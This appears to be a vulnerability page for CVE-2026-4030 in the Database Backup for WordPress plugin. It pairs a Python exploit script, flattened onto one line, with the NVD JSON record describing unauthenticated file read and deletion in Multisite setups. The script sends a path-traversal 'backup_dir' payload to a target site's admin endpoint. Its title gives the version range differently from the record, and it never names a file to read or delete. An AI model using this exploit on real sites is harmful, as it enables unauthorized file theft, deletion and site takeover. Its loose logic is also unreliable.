CVE-2026-4030

import requests # Exploit Title: Database Backup for WordPress < 2.5.2 - Unauthenticated Arbitrary File Read/Deletion # Vulnerable Endpoint: wp-db-backup.php target_url = "http://target-wordpress-site.com" # The exploit leverages the 'backup_dir' parameter which is not properly sanitized # and bypasses authorization checks in Multisite environments. payload = { "backup_dir": "../../../../../", # Traversal path to root or specific target "step": "2", "do_backup": "backup" } try: # Sending unauthenticated request response = requests.get(f"{target_url}/wp-admin/admin.php?page=wp-db-backup", params=payload) if response.status_code == 200: print("[+] Request sent successfully. Check response for file listing or deletion confirmation.") print(response.text[:500]) # Print snippet of response else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}")

{"cve": {"id": "CVE-2026-4030", "sourceIdentifier": "[email protected]", "published": "2026-05-14T13:16:20.767", "lastModified": "2026-05-14T14:28:41.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Database Backup for WordPress plugin for WordPress is vulnerable to unauthorized arbitrary file read and deletion in all versions up to, and including, 2.5.2. This is due to the plugin not properly enforcing the return value of its authorization check combined with a user-controlled backup directory parameter. This makes it possible for unauthenticated attackers to read and delete arbitrary files on the server, leading to Sensitive Information Exposure and potential site takeover. Note: This vulnerability is only exploitable in WordPress Multisite environments where the deprecated is_site_admin() function exists."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-db-backup/tags/2.5.2/wp-db-backup.php#L1623", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-db-backup/trunk/wp-db-backup.php#L121", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-db-backup/trunk/wp-db-backup.php#L157", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-db-backup/trunk/wp-db-backup.php#L1632", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3510595/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3e21b550-e1c5-4e23-9999-16c837353da9?source=cve", "source": "[email protected]"}]}}